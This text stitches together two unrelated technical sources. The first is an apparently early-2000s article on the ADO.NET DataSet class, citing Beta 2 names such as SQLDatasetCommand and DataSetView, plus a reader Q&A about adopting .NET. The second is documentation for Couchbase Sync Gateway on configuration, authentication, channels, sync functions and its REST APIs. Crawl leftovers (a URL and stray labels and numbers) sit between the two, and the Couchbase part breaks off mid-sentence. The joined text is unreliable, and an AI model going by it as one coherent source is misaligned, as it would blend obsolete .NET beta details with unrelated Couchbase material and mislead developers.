And finally, a DataSet object is an instance of a .NET managed class, rather than an instance of a COM object—more often than not, an instance of a COM Automation object. This means that a DataSet object can be safely stored in an ASP .NET Session slot without concerns for the overall scalability of the application. In addition, the block of records it contains can be transmitted across a network irrespective of corporate firewalls along the way. This happens because .NET objects are thread-safe and do not require thread affinity, and because a DataSet is already a XML stream that travels quite comfortably over HTTP and port 80.
A DataSet object is a class that descends from Component and implements the IListSource interface. In Visual Basic .NET, the declaration looks like the following:
Public Class DataSet
Inherits Component
Implements IListSource
The IListSource interface, in turn, derives from IList and owes its content to some sort of data source to which the code connects. IListSource has a single method, called GetList, to expose such content. GetList returns an IList-based collection of items. IList is a descendant of the base ICollection interface and turns out to be the abstract base class of all .NET lists.
At the end of the day, a DataSet object is a collection of more specialized objects holding the data. On its own, the DataSet provides the ability to serialize according to given XML schemas and an all-encompassing nature that is remarkably helpful when you need to keep in a single place more tables of inter-related data.
In addition, a DataSet is a completely-in-memory object with all the pro and con considerations that usually applies to this role. It is easy and quick to access as long as the amount of information stored is neither particularly volatile nor growing so fast as to require frequent data refresh.
A DataSet is a container that looks like a database. All the data you manipulate is kept in memory, yet it provides you with methods to index, sort, logically join, set constraints, and check data integrity. Only a few of these extended functionalities are implemented directly by the DataSet object, which reinforces the overall feeling of integration and consistency that pervades across the whole .NET Framework.
You create a DataSet object using the ordinary new keyword with a couple of possible constructors:
DataSet data = new DataSet();
DataSet data = new DataSet("MyDataSet");
As you can see, the difference is only in the name you want to assign to the newly created data container. Either you omit the name or it must be a non-empty name. If you omit the name, and therefore you use the former constructor, the name defaults to NewDataSet. However, the dataset's name doesn't play a viable role in the object usage. The only place where you will ever see it used is in the root tag of the XML document that renders the content of the DataSet.
Let's review the geography of DataSets—namely the sub-objects and collections that form the actual programming model—and explore the various approaches you can take to populate a DataSet object.
The DataSet class comprises three main collections:
Tables gathers all the child tables of data that you should be getting from their external sources and explicitly adds them to the repository. Tables are rendered through the DataTable object. Once part of the DataSet family, a table becomes automatically serializable through the DataSet's XML schema. Any table in a DataSet is characterized by a unique name, but can also be accessed through index.
A relation is a logical SQL JOIN statement that creates a relationship between two tables previously added to the DataSet. The relation links the two tables on the matching values in a common column in much the same way a JOIN statement does.
The big difference between a DataSet relation and JOIN statements is that the two tables involved in the link remain distinct and no unified table, no matter physical or logical, is created. A relation can be seen as an extra column added to rows on the primary table whose content is an array of matching rows on the target table.
ExtendedProperties gets the collection of custom user information whose structure and logic is completely up to you. You use this property in the same way you would use ASP Session or Application collections.
data.ExtendedProperties.Add("refreshat", "12:00");
Among the other properties of the DataSet object, a special mention deserves the DefaultView property. It returns a DataSetView object that represents a custom, filtered view on all the tables currently forming the dataset. This feature allows you to build multiple different views of the dataset content; for example, views showing different fields for different users.
To set a dataset's view, you first create and populate the DataSet. Next, you create a new instance of the DataSetView object passing the DataSet reference to the class constructor.
DataSet data = new DataSet();
// fill the data set here
DataSetView dsv = new DataSetView(data);
So far, you have created an association between two objects but you haven't provided the information needed to create a collection of table-specific views. You do this through a new type of object—the TableMapping object.
A table mapping is meant to define the custom settings used to view a table in a DataSetView view. Basically, it applies a sort of mask on top of any table in the DataSet. This mask can provide automatic filtering, sorting, as well as an alternative naming for fields. By simply assigning a DataSetView object to the DefaultView property of a DataSet, you enable a different view of the same content.
Another couple of important elements in the DataSet's geography are the Xml and XmlData properties. They let you read or change the DataSet structure and content using XML. The Xml property exposes both schema and data. The XmlData property makes available, for reading and writing, only data.
The DataSet is a publicly creatable object, as are almost all the other ADO.NET objects. Normally, you create a DataSet with or without a custom name. However, DataSetName is the property you can use to get and set the DataSet's name. Next, you might want to set some environment attributes such as CaseSensitive and EnforceConstraints.
The former determines whether string comparisons within child DataTable objects have to be case-sensitive. By default, the property returns False.
EnforceConstraints is a Boolean value that indicates whether any constraint rule set through the DataTable's Constraints collection has to be verified when attempting an update operation. Constraints are a collection of Constraint objects, each of which defines a rule enforced by the table to maintain data integrity.
On the XML side of a DataSet, you can decide to set the namespace name (the Namespace property) and the namespace's prefix (the Prefix property) to be used when serializing to XML the content of the object.
Upon creation, a DataSet is empty as its Tables collection has no element. You can add tables to the collection in two basic ways—through a .NET data adapter or by manually creating a DataTable object and adding it to the collection.
A data adapter takes the form of a SQLDatasetCommand or a ADODatasetCommand object. (Notice that the names of these classes are subject to change with the Beta 2 of .NET.)
A data adapter exposes methods that hide what really happens under the covers and is not at all different from what you can do manually. The DataTable object is first created as follows:
DataTable dt = new DataTable();
Next, it is given a schema in terms of columns and related attributes, and finally it gets filled up with rows. You use the DataTable's Rows collection for this and append one DataRow object after the other. When the table is ready, it is inserted in the Tables collection.
A data adapter executes this procedure under the control of the FillDataSet method.
SQLDatasetCommand cmd = new SQLDatasetCommand(strCmd, strConn);
DataSet data = new DataSet();
cmd.FillDataSet(data, strTableName);
Such a method serves the purpose of updating data and schema of the specified table in the given DataSet. FillDataSet retrieves the data from the data source using the query command you passed through the adapter's class constructor.
There must be a connection object associated with the command, right? It can specified either through a SQLConnection object (an ADOConnection object if you're targeting an OLE DB data source) or a simpler connection string. Either way, if the connection needed is closed, it is opened to retrieve data, then closed. If the connection is open before FillDataSet is invoked, it is used and left open.
FillDataSet has an extra calling prototype that lets you load only a portion of all the selectable records at a time. You specify the 0-based position of the record to start loading with and the maximum number of records to retrieve for each step. This trick allows you to implement an asynchronous reading of records from virtually any data source.
Furthermore, bear in mind that if the command returns multiple results, FillDataSet will only take into account the first result—or the specified portion of it in case you're used to reading a maximum number of records at a time. By contrast, if the command returns no rows, then no table is added to the DataSet.
Any error that might occur while populating the data set is that it won't roll back the changes already submitted. In fact, any row added or modified prior to the error is acquired and never canceled. When your aim is to refresh a dataset, as opposite to fill it up, you can avoid duplicated rows if you use the same SQL statement that was initially used to populate the DataSet and primary key information is present.
Primary key information is normally inferred by the table metadata if you're fetching records out of a relational database. Otherwise, it might be set through the PrimaryKey property of the DataTable object.
DataColumn[] keys = new DataColumn[1];
DataTable dt = new DataTable("MyList");
keys[0] = dt.Columns["ID"];
dt.PrimaryKey = keys;
The DataSet object has the built-in ability to recover some viable missing information. The MissingSchemaAction property, for example, indicates how to manage potentially inconsistent situations where missing tables or columns may cause unpredictable behaviors. By assigning a predefined value to MissingSchemaAction, you decide whether the missing information must be simply added to the DataSet's schema or raise a warning or an error. If you set the property to AddWithKey as follows:
data.MissingSchemaAction = MissingSchemaAction.AddWithKey
Then all the necessary columns and key information is added to complete the schema.
Data adapters are specialized objects that end up creating and filling data tables. You can run the same procedure under your own control and populate a data set with non-database records. For example, the following snippets shows how to add a table with directory information:
DataTable dt = new DataTable();
DataColumn colName = new DataColumn();
colName.DataType = System.Type.GetType("System.String");
colName.ColumnName = "FolderName";
dt.Columns.Add(colName);
DataColumn colDesc = new DataColumn();
colDesc.DataType = System.Type.GetType("System.String");
colDesc.ColumnName = "FolderDesc";
dt.Columns.Add(colDesc);
Directory dir = new Directory(strDir);
foreach (Directory d in dir.GetDirectories())
{
DataRow dr = dt.NewRow();
dr["FolderName"] = d.Name;
dr["FolderDesc"] = "Content of " + d.Name;
dt.Rows.Add(dr);
}
DataSet data = new DataSet();
data.Tables.Add(dt);
All the tables linked to a DataSet object can be manipulated through the same API regardless of their actual origin. Whether you created a table from SQL Server or from scanning the content of a folder makes no difference whatsoever when it comes to putting tables into relation or indexing or persisting to XML.
All the data is kept in memory and can be updated, sorted, and filtered without resorting to any server-side functionality. All database-like functionalities are implemented as in-memory features including a commit model that closely resembles the transaction model of many DBMS. You really only need to get back to the server when you want to save changes to the data source. This will raise another category of problems that I'll tackle in an upcoming column.
I feel that one day I could love ADO.NET and ASP .NET, but this day is yet to come. Actually, I don't feel comfortable enough with them to take the plunge to recommend it for the next project. Ideally, I would wait at least one year to start and more or less two years to go live. Production boxes are very fierce beasts. Am I missing something?
We're really close now to the Beta 2 of .NET. Many companies involved in pilot projects are already "playing" with it as I write this response. Having it publicly available is a matter of weeks. Once you have put your hands on it, have a careful look at the documentation. The more you feel comfortable with that, the more I recommend that you take the plunge.
When you write code, system documentation is your best friend. This is even truer if you consider that you will be working with a new and somehow unexplored platform. To take the project home, you must survive by relying on your team skills and the documentation available.
By the time the first .NET platform ships, we will certainly have excellent documentation. Already having good documentation for Beta 2 is a significant signal that we're headed in the right direction.
Personally, I'd first check documentation for ASP .NET server controls, in particular, the custom controls. Then, I'd make sure that the ADO.NET documentation for related objects (and for overrides of the same methods) is not the offspring of a more or less smart cut-and-paste. Finally, I'd make sure that I feel confident in my ability to deploy ASP .NET applications.
Loving .NET might not be enough to start a real-world project, but feeling comfortable with the SDK and documentation is a great place to start. It's exactly what you need to start a new "production" story..
|
http://msdn.microsoft.com/en-us/library/ms810289.aspx
|
crawl-002
|
refinedweb
| 3,271
| 55.13
|
Partial.
I don’t know any non MVC violating solution either, but why didn’t you consider using HtmlHelper.RenderAction?
< % Html.RenderAction
(c => c.Action()); %>
If you know that the data is going to be needed in every single page why not use the old standby of getting the data from the global.asax and placing it in the context items collection, then create yourself a viewdata base model with a property that retrieves that data from the items collection. Add that base to the generic on the master page and inherit all other view data models from that base? Then you have the data available at every request. Just a thought.
@Paco — RenderAction() was moved into the Microsoft.Web.MVC namespace after the last release (that means that it will most likely be in futures and not the core MVC framework).
You have illustrated the need for subcontrollers. HomeController should use a subcontroller for the partials. Each action can use a different subcontroller specific to the needs of the action.
You don’t want an inheritance hierarchy to attempt to solve a composition problem.
It’s unfortunate that the MVC team is spending so much time on trivial crap like AJAX helpers instead of working on a good solution for this very common problem.
I would definitely have included RenderAction, even though it is in the ‘Futures’ at the moment, especially if including a detailed instruction and code sample of how to do it in code-behind. There’s no ‘good’ way to do this at all right now, but RenderAction is a pretty decent ‘not-good’ way to do it. The abstract base class method is a mess and could grow out of control as your application gets more complex.
That is a bit of work for something that should be simple. I agree subcontrollers would be a solution the best solution, and would still be testable.
RenderAction is the best possible way to do this. It helps keep design and code much simple and modular. I strongly feel that no other way is as elegant as RenderAction.
I think the problem some people have with RenderAction is that it’s not sufficiently “MVC” because you have the view calling back to a controller. While I’d agree that isn’t strictly MVC, I don’t think you’re going to get much better.
Besides, it’s kind of the same way of thinking that you’d use with an AJAX app. In an AJAX app, you’d have client-side code firing up a controller action and then stuffing the result in a DIV or getting a JSON result and programmatically changing the UI. Bottom line is that in this case you also have UI code calling back to a controller. Granted, it’s generally in response to a user action, but it’s still UI code using a controller…
“You don’t want an inheritance hierarchy to attempt to solve a composition problem.” – Jeffrey Palermo
Exactly!
“I think the problem some people have with RenderAction is that it’s not sufficiently “MVC” because you have the view calling back to a controller. While I’d agree that isn’t strictly MVC, I don’t think you’re going to get much better.” – Jamie
I get that feeling too. If we would have to add an extra “page composition layer” to the mix, I’m afraid the simplicity/beauty of the MVC framework would soon be lost.
I would solve this problem using interceptors attached to my controller methods by an IoC container.
That is similar to using the ActionFilter, but the interceptors are less intrusive imo.
I love the way you go tru different options to find a solution. It teaches me a lot about the way you can do stuff in MVC. But I agree with Jeffrey that this problem is mostly a composition problem. Inheritance implements an “is-a” relation and I think your HomeControllerPopular is-not-a HomeControllerFeatuerd. Also inheritance very tightly couples classes and makes your solution less flexible.
I think you should really have the ApplicationController and a HomeController that inherits from that. But then the HomeController should delegate some of its work to composites like the FeaturedController. Makes sense?
@Jeffrey, @Richard – You are absolutely right about the central issue being compositionality and inheritance being a bad approach to solving it.
I still have mixed feelings about the subcontroller approach. You take a trip from Seattle to Paris and then you phone home to have each of your bags sent to you? It seems like a better idea (less fuel, more scalable) to bring all of your luggage on the initial plane ride.
Also, the subcontroller approach couples the design of your view to the design of your controllers. Creating a new user control requires you to create a new controller action. It would be nice if your page design could be completey independent from the architecture of your application.
Great post! I really like the first solution and that’s the one I’ve been using. Since the problem relates to testability, it is always tackled by a little mangling in the tests. In this case it would suffice to mock ActionExecutingContext and explicitly call the OnActionExecuting method. That’s how I started out until I found PostSharp (an AOP framework for .NET, in case you’re not aware): Partial becomes an aspect of the action. It even fits better conceptually, since there’s no actual filtering involved when using ActionFilterAttribute, but injection.
Hi, thank you for your Tips, they’re very usefull, and this post in particular.
My problem is simple, I don’t want a user control every where but in a sub category of my site.
I’ve tried to integrate th In/Out site from Codeplex () but it uses the Preview 3 of MVC.
At this prehistoic time they used a ComponentController (UpdateComponentController) for user control and put in the view
that seems very simple. why do you remove this in Preview 4? Or in other words why should I do 4 or more derived class to do this ?
@Ernest – RenderAction() replaces RenderComponent() and RenderAction() will be in the futures download. So you can use RenderAction() with the warning that it is not supported by Microsoft.
The comments that I received on this post convinced me that using an action filter (method number #3) is the right way to deal with the scenario that you describe. You can create an action filter that injects the view data that you need for your user control. Decorate each controller action that returns a view that contains the user control with the action filter.
Hope this helps!
@LarryB – I think we’re at the same wave length, I’ve been taking this exact approach ever since I started on mvc.net, it’s easy to write and read, and, hmmm, well, I just like it better than all other solutions I’ve seen so far.
Your final solution is begging to replaced with a set of decorators. Could you substitute a decorator pattern wired up in your IControllerFactory instead of the static class inheritance?
CALL TO ACTION: Master pages need some love
Please go to the above and leave a comment if you think master pages need some love…
I think there is a misunderstanding about how the RenderAction method works. It does not call back to the controller, thereby coupling the view and the controller. Doing so would require the controller action to have detailed knowledge of the page data requirements for all parts of the display. This would require the controller and actions for need to handle processing for concerns that are not part the controllers primary functionaliy. This would be a bad thing, IMHO, which would result in the controller requiring changes when the view content is changed, but not the primary data. This would happen if you use attributes or hard code in the controller method.
What RenderAction does is cause the entire MVC lifecycle to be executed for the conroller/action specified and returns the rendered content for display. The view for the subview is just another view (aspx or ascx) and the controller can be specified. Thus all the work for the subview can be handled by another, more apprpriate controller.
For example, in an ecommerce site, the Shopping Cart Summary user control could be handled by the ShoppingCartController, independent of the ShoppingController which would handle the shopping exerience.
The next steps would be how to does this with AJAX and how to trigger subview updates (preferably as a result of model changes)
Would any of these options work for passing data bwteen controllers? I have an account controller that is responsibile for authenication. Once a user is authenicated, I want to call the member controller view and pas in teh user data. Is this possibile, or am I missing something?
thanks
Stephen, great stuff and has definitely helped me a lot to catch MVC in immense details… Do you have code download for all of your samples? For example this tip31 doesn’t have download associated to it or is it in purpose to left out?
While your solution works, it’s still more work than I think it should be. Why not have the ability to concatenate views? That way, one could have individual views for the header, content, and footer.
Stephen, Can u please provide a sample project to download. I want to see the implementation. I am not able to implement this tip. It will be very nice you post some live example here.
Good solution …
Just one bigggg problem …
In the control constructor the HttpContext, Request, etc are null.
There are any solution different of create an action filter in ApplicationController?
i’m not doing so well in IT, but your post really great. Good work stephen.
thx, very helpfull 🙂
Good work!
OK, so I’m new to both ASP.NET and MVC, but where do the ‘Solution4.Partials’ and ‘Solution4.Models’ classes come from?
And how do you get to access the members of the ‘Master’ class, like ‘Master.AddViewData’ in the ‘ApplicationController’?
265rew I tried to mock a call to a Linq to SQL query, but I am struggling.
These are the properties that you would expect for the f function’s Variable object. The first items, represents the parameters passed to the f() function. The remaining items correspond to each of the f() function’s local variables.
online phd degrees | buy degree | accredited degree
P.S. – Thanks for pointing out the gotcha on longer prototype chains. I thought I *could* walk the prototype chain via repeated constructor.prototype calls under normal circumstances.
fast degree | honorary degree
f34 I believe it is a promising (currently version 4.0). So I would stick with it.. thanks f 32
Seems to me the second solution is the simplest solution that cleanly separates the concerns. The other solutions are ego massage. The argument that the second solution is inadequate because the filters are not executed when an action method is called from a test case is irrelevant. A test that ensures the method is decorated with the proper action filters is all that is needed.
The other solutions are ego massage. The argument that the second solution is inadequate because the filters are not executed when an action method is called from a test case is irrelevant.
classifieds |job listings |articles
Instead of having a hierarchy of controllers, why not have a hierarchy of viewdata classes? Have strongly typed views with an abstract viewdata base class. I’ve grown fond of creating custom viewdata classes instead of the dictionary method. Just a thought.
Developer | One White Wedding !
|
http://stephenwalther.com/archive/2008/08/12/asp-net-mvc-tip-31-passing-data-to-master-pages-and-user-controls
|
CC-MAIN-2017-43
|
refinedweb
| 1,958
| 64.71
|
Obsolete documentation
For the latest Couchbase Mobile documentation, visit the Couchbase Mobile developer portal.
Couchbase Sync Gateway is an add-on that enables Couchbase Server 2.0 and later to act as a replication endpoint for Couchbase Lite. Sync Gateway runs an HTTP listener process that provides a passive replication endpoint and uses a Couchbase Server bucket as persistent storage for all database documents.
Sync Gateway provides an HTTP front-end for Couchbase Server that syncs with Couchbase Lite. The following figure shows how Sync Gateway interacts with mobile apps and Couchbase Server.
You can run Sync Gateway on the following operating systems:
Mac OS X 10.6 or later with a 64-bit CPU
Red Hat Linux
Ubuntu Linux
You can download Sync Gateway for your platform from.
The download contains an executable file called
sync_gateway that you run as a command-line tool. For convenience, you can move it to a directory that is included in your $PATH environment variable.
You can connect Sync Gateway to Couchbase Server 2.0 or later.
To connect Sync Gateway to Couchbase Server:
sync_gatewayin the default pool.
You can use any name you want for your bucket, but
sync_gateway is the default name that Sync Gateway uses if you do not specify a bucket name when you start Sync Gateway. If you use a different name for your bucket, you need to specify the
-bucket option when you start Sync Gateway.
You start Sync Gateway by running
sync_gateway with the
-url option. The argument for the
-url option is the HTTP URL of the Couchbase server to which you want Sync Gateway to connect. If you do not include any additional command-line options, the default values are used.
The following command starts Sync Gateway on port 4984, connects to the default bucket named
sync_gateway in the Couchbase Serving running on localhost, and starts the admin server on port 4985.
$ ./sync_gateway -url
If you used a different name for the Couchbase Server bucket or want to listen on a different port, you need to include those parameters as command-line options. For information about the available command-line options, see Administering Sync Gateway.
You can stop Sync Gateway by typing Control-C. There is no specific shutdown procedure and it is safe to stop it at any time.
This section describes how to administer Sync Gateway.
You can launch the
sync_gateway with command-line options. However, in the long run, it’s better to use JSON configuration files, which are the only way to serve multiple databases. You can also combine command-line options with configuration files.
The format of the
sync_gateway command is:
sync_gateway [Options] [ConfigurationFile...]
Options
The command-line tool uses the regular Go flag parser, so you can prefix options with one or two hyphen (-) characters and give option values either as a following argument or in the same argument after an equal sign (=). pretty-printed JSON responses.
$ sync_gateway -url=walrus: -bucket=db -pretty
The following command uses a Walrus database that is persisted to a file named /tmp/walrus/db.walrus.
$ sync_gateway -url=walrus:///tmp/walrus -bucket=db -pretty
Instead of entering the settings on the command-line, you can store them in a JSON file and then just provide the path to that file as a command-line argument. As a bonus, the file lets you run multiple databases.
If you want to run multiple databases you can either add more entries to the
databases property in the configuration file, or you can define each database in its own configuration file and list each of the configuration files on the command line.
Configuration files have one syntactic feature that’s not standard JSON: any text between backticks (`) is treated as a string, even if it spans multiple lines or contains double-quotes. This makes it easy to embed JavaScript code , such as the sync function.
The following sample configuration file starts a server with the default settings:
{ "interface":":4984", "adminInterface":":4985", "log":["REST"], "databases":{ "sync_gateway":{ "server":"", "bucket":"sync_gateway", "sync":`function(doc) {channel(doc.channels);}` } } }
You can see an example of a more complex configuration file in the CouchChat-iOS sample app.
The following command starts Sync Gateway with the parameters specified in a configuration file named config.json:
$ sync_gateway config.json
The following command starts Sync Gateway with the parameters specified in a configuration file named config.json and adds additional logging by including the -log option on the command line:
$ sync_gateway -log=HTTP+,CRUD config.json
Sync Gateway provides the following REST APIs:
The Sync REST API is used for client replication. The default port for the Sync.
The APIs are accessed on different TCP ports, which makes it easy to expose the Sync REST API on port 4984 to clients while keeping the Admin REST API on port 4985 secure behind your firewall.
If you want to change the ports, you can do that in the configuration file.
To change the Sync REST API port, set the
interface property in the configuration file.
To change the Admin REST API port, set the
adminInterface property.
Sync Gateway does not allow anonymous or guest access by default. A new server is accessible through the Sync REST API only after you enable guest access or create some user accounts. You can do this either by editing the configuration file before starting the server or by using the Admin REST API. For more information, see Anonymous Access.
You can authorize users and control their access to your database by creating user accounts and assigning roles to users.
You manage accounts by using the Admin REST API.This interface is privileged and for administrator use only. To allow clients property, property,/.
A special user account named
GUEST applies to unauthenticated requests. Any request to the Sync REST API that does not have an
Authorization header or a session cookie is treated as coming from the
GUEST account. This account and all anonymous access is disabled by default.
To enable the GUEST account, set its
disabled property to false. You might also want to give it access to some channels. If you don’t assign some channels to the GUEST account, anonymous requests won’t be able to access any documents. The following sample command enables the GUEST account and allows it access to a channel named public:
$ curl -X PUT localhost:4985/$DB/_user/GUEST --data \ '{"disabled":false, "admin_channels":["public"]}'.
You can authenticate users by using the methods described in the following sections.
Sync Gateway allows clients to authenticate by using either HTTP Basic Auth or cookie-based sessions. The session URL is
/dbname/_session..
Sync Gateway supports Mozilla Persona, a sign-in system for the web that allows clients to authenticate by using an email address. You can enable Persona either by modifying your server configuration file or by starting Sync Gateway with an additional command-line option.
To enable Persona by modifying the configuration file, add a top-level
persona property to the config.json file. The value of the
persona property is an object with an
origin property that contains your server’s canonical root URL as seen by clients. For example:
"persona" : { "origin" : "", "register" : true }
To enable Persona when you start Sync Gateway, add the
-personaOrigin option to the command line and specify the server’s canonical root URL. For example:
$ sync_gateway -personaOrigin
The
origin URL must be specified explicitly because the Persona protocol requires both client and server to agree on the server’s identity, and there’s no reliable way to derive the URL on the server, especially if it’s behind a proxy.
After that’s set up, you need to set the
Clients log in by sending a POST request to
/dbname/_persona. The request body is a JSON document that contains an
assertion property whose value is the signed assertion received from the identity provider. Just as with a
_session login, the response sets a session cookie.
If the
register property of the Facebook or Persona configuration is true, then clients can implicitly register new user accounts by authenticating through Facebook or Persona. or Persona, unless the app server replaces the password with one known to the client.
An app server can create a session for a user by sending a POST request to
/dbname/_session. This works only on the admin port.
The request body is a JSON document with the following properties:
name: User name
ttl: Number of seconds until the session expires. This is an optional parameter. If
ttl is not provided, the default value of 24 hours is used.
The response body is a JSON document that contains the following properties:
session_id: Session string
cookie_name: Name of the cookie the client should send
expires : Date and time that the session expires
This allows the app server to optionally do its own authentication using the following control flow:
Client sends credentials to your app server.
App server authenticates the credentials however it wants (LDAP, OAuth, and so on).
App server sends a POST request with the user name to the Sync Gateway Admin REST API server
/dbname/_session endpoint.
If the request fails with a 404 status, there is no Sync Gateway user account with that name. The app server can then create one (also using the Admin REST API) and repeat the
_session request.
The app server adds a
Set-Cookie: HTTP header to its response to the client, using the session cookie name and value received from the gateway.
Subsequent client requests to the gateway will now include the session in a cookie, which the gateway will recognize. For the cookie to be recognized, your site must be configured so that your app’s API and the gateway appear on the same public host name and port.
By default, a session created on Sync Gateway lasts 24 hours. If you create sessions by sending a POST request to
/db/_session, you can set a custom value that overrides the system default. However, if you are using Persona for authentication, the only way to customize the session length is by modifying the
kDefaultSessionTTL constant in the
rest_session.go file.
This section contains information and concepts you need to know when developing apps that interact with Sync Gateway.:
A replication from Sync Gateway specifies a set of channels to replicate. Documents that do not belong to any of the specified channels are ignored (even if the user has access to them).
You do not need to register or preassign channels. Channels come into existence as documents are assigned to them. Channels with no documents assigned to them are empty.
Valid channel names consist of text letters [A–Z, a–z], digits [0–9], and a few special characters [-+=/_.@] . The empty string is not allowed. The special channel name
* denotes all channels. Channel names are compared literally—the comparison is case and diacritical sensitive.
You assign documents to channels either by adding a
channels property to the document or by using a sync function. No matter which option you choose, the channel assignment is implicit—the content of the document determines what channels it belongs to.); }
if a client doesn’t specify any channels to replicate, it gets all the channels to which its user account has access. Due to this behavior, most apps do not have to specify a channels filter—instead they can just do the default sync configuration on the client (that is, specify the Sync Gateway database URL with no filter).
A document can be removed from a channel without being deleted. For example, this can happen when a new revision is not added to one or more channels that the previous revision was in. Subscribers (downstream databases pulling from this database) should know about this change, but it’s not exactly the same as a deletion.
Sync Gateway’s
_changes feed includes one more revision of a document after it stops matching a channel. It adds a
removed property to the entry where this happens. (No client yet recognizes this property, though.) The value of the
removed property is an array of strings where each string names a channel in which this revision no longer appears. Also, the body of the document appears to be empty to the client.
The effect on the client is that after a replication it sees the next revision of the document (the one that causes it to no longer match the channel). It won’t get any further revisions until the next one that makes the document match again.
This algorithm ensures that any views running in the client do not include an obsolete revision. The app code should use views to filter the results rather than just assuming that all documents in its local database are relevant.
If a user’s access to a channel is revoked or a client stops syncing with a channel, documents that have already been synced are not removed from the user’s device.
The
all_channels property of a user account determines which channels the user can access. Its value is derived from the union of:
admin_channelsproperty, which is settable via the admin REST API.
access()calls from sync functions invoked for current revisions of documents (see Programmatic Authorization).
all_channelsproperties of all roles the user belongs to, which are themselves computed according to the above two rules.
The only documents a user can access are those whose current revisions are assigned to one or more channels the user has access to:
_all_docsproperty is filtered to return only documents that are visible to the user.
client’s
since parameter. That way the next client pull retrieves all documents to which the user now has access."}) } }
Walrus is a simple, limited, in-memory database that you can use in place of Couchbase Server for unit testing during development.
Use the following command to start a Sync Gateway that connects to a single Walrus database called
sync_gateway and listens on the default ports:
$ sync_gateway -url walrus:
To use a different database name, use the
-bucket option. For example:
$ sync_gateway -url walrus: -bucket mydb
By default, Walrus does not persist data to disk. However, you can make your database persistent by specifying an existing directory to which Sync Gateway can periodically save its state. It saves the data to a file named
/<directory>/sync_gateway.walrus. For example, the following command instructs Sync Gateway to save the data in a file named
/data/sync_gateway.walrus:
$ mkdir /data $ sync_gateway -url walrus:/data
You can use a relative path when specifying the directory for persistent data storage:
$ mkdir data $ sync_gateway -url walrus:data
You can also specify the directory for persistent data storage in a configuration file. The config.json file would look similar to the following JSON fragment:
{ "databases":{ "couchchat":{ "server":"walrus:data" ... }
To interact with Couchbase Server Sync Gateway, you use the following APIs:
For information about controlling access to the REST APIs, see Administering the REST APIs.
The sync function is the core API you’ll be interacting with on the Sync Gateway. For simple applications it might be the only server-side code you need to write. For more complex applications it is still a primary touchpoint for managing data routing and access control.
For more information about using sync functions, read about channels and the description of the CouchChat data model.
If you don’t supply a sync function, Sync Gateway uses this as a default:
function (doc) { channel(doc.channels); }
The arguments enable the sync function to be used for validation as well as data routing. Your implementation can omit the
oldDoc parameter if you do not need it (JavaScript ignores extra parameters passed to a function).
function (doc, oldDoc) { // your code here }
The sync function arguments are:
doc—The document that is being saved. This matches the JSON that was saved by the mobile client and replicated to Sync Gateway. No metadata or other fields are added, although the
_id and
_rev fields are available.
oldDoc—If the document has been saved before, the revision that is being replaced is available in this argument. In the case of a document with a conflicting revision, the provisional winning revision is passed in
oldDoc. If the document is being deleted, there is a
_deleted property whose value is true.
From within the sync function you create changes in the Sync Gateway configuration via callback functions. Each call manages a small amount of configuration state. It is also tied back to the document which initiated the call, so that when the document is modified, any configuration made by an old version of the document is replaced with configuration derived from the newer version. Via these APIs, documents are mapped to channels. They can also grant access to channels, either to users or roles. Finally, you can reject an update completely by throwing an error. The error message will be returned to the synchronizing client, which will log it or potentially display it to the user.
throw()¶
The sync function can prevent a document from persisting or syncing to any other users by calling
throw() with an error object. This also prevents the document from changing any other gateway configuration. Here is an example sync function that disallows all writes to the database it is in.
function (doc) { throw ({forbidden : "read only!"}) }
The key of the error object may be either
forbidden (corresponding to an HTTP 403 error code) or
unauthorized (corresponding to HTTP 401 error). The
forbidden error should be used if the user is already authenticated and the account they are syncing with is not permitted to modify or create the document. The
unauthorized error should be used if the account is not authenticated. Some user agents will trigger a login workflow when presented with a 401 error.
A quick rule of thumb: most of the time you should use the
throw({forbidden : "your message here"}) statement because most applications require users to be authenticated before any reads or writes can occur.
The
channel call routes the document to the named channel. It accepts either a channel name string, or an array of strings, if the document should be added to multiple channels in a single call. The channel function can be called zero or more times from the sync function, for any document. The default function (listed at the top of this document) routes documents to the channels listed on them. Here is an example that routes all “published” documents to the “public” channel.
function (doc, oldDoc) { if (doc.published) { channel ("public"); } }
As a convenience, it is legal to call
channel with a
null or
undefined argument; it simply does nothing. This allows you to do something like
channel(doc.channels) without having to first check whether
doc.channels exists.
The
access call grants access to channel to a given user or list of users. It can be called multiple times from a sync function.
The effects of the
access call last as long as this revision is current. If a new revision is saved, the
access calls made by the
sync function will replace the original access. If the document is deleted, the access is revoked. The effects of all access calls by all active documents are effectively unioned together, so if any document grants a user access to a channel, that user has access to the channel. Note that revoking access to a channel will not delete the documents which have already been synced to a user’s device.
The access call takes two arguments, the user (or users) and the channel (or channels). These are all valid ways to call it:
access ("jchris", "mtv") access ("jchris", ["mtv", "mtv2", "vh1"]) access (["snej", "jchris", "role:admin"], "vh1") access (["snej", "jchris"], ["mtv", "mtv2", "vh1"])
As a convenience, either argument may be
null or
undefined, in which case nothing happens.
Here is an example function that grants access to a channel for all the users listed on a document:
function (doc, oldDoc) { access (doc.members, doc.channel_name); // we should also put this document on the channel it manages channel (doc.channel_name) }
If a user name in an
access call begins with the prefix
role:, the rest of the name is interpreted as a role, not a user. The call then grants access to the channel(s) for all users with that role.
The
role call grants a user a role, indirectly giving them access to all channels granted to that role. It can also affect the user’s ability to revise documents, if the access function requires role membership to validate certain types of changes.
Its use is similar to
access:
role(user_or_users, role_or_roles);")
NOTE: Roles, like users, have to be explicitly created by an administrator. So unlike channels, which come into existence simply by being named, you can’t create new roles with a
role() call. Nonexistent roles won’t cause an error, but have no effect on the user’s access privileges. (It is possible to create a role after the fact; as soon as it’s created, any pre-existing references to it take effect.)
You use the Sync REST API to synchronize a local database with a remote database. The sync takes place over HTTP and uses JSON documents in the message bodies. For more information about the synchronization protocol, see Replication Algorithm. You can also see the URL mappings in the Sync Gateway source code.
To access the Sync REST API, you need to have a user account.
You can use the following requests on the remote database. Replace db with the dame of your database.
Push or Pull Requests:
Read the last checkpoint
GET /db/_local/checkpointid
Save a new checkpoint
PUT /db/_local/checkpointid
Push Requests:
Create remote database
PUT /db
Find revisions that are not known to the remote database
POST /db /_revs_diff
Upload revisions
POST /db/_bulk_docs
Upload a single document with attachments
PUT /db/docid?new_edits=false
Pull Requests:
Find changes since the last pull (feed can be normal or longpoll)
GET /db/_changes?style=all_docs&feed=feed&since=since&limit=limit&heartbeat=heartbeat
Download a single document with attachments
GET /db/docid?rev=revid&revs=true&attachments=true&atts_since=lastrev
Download first-generation revisions in bulk
POST /db/_all_docs?include_docs=true
The Admin REST API is a superset of the Sync REST API with the following major extensions:
By default, the Admin REST API runs on port 4985 (unless you change the
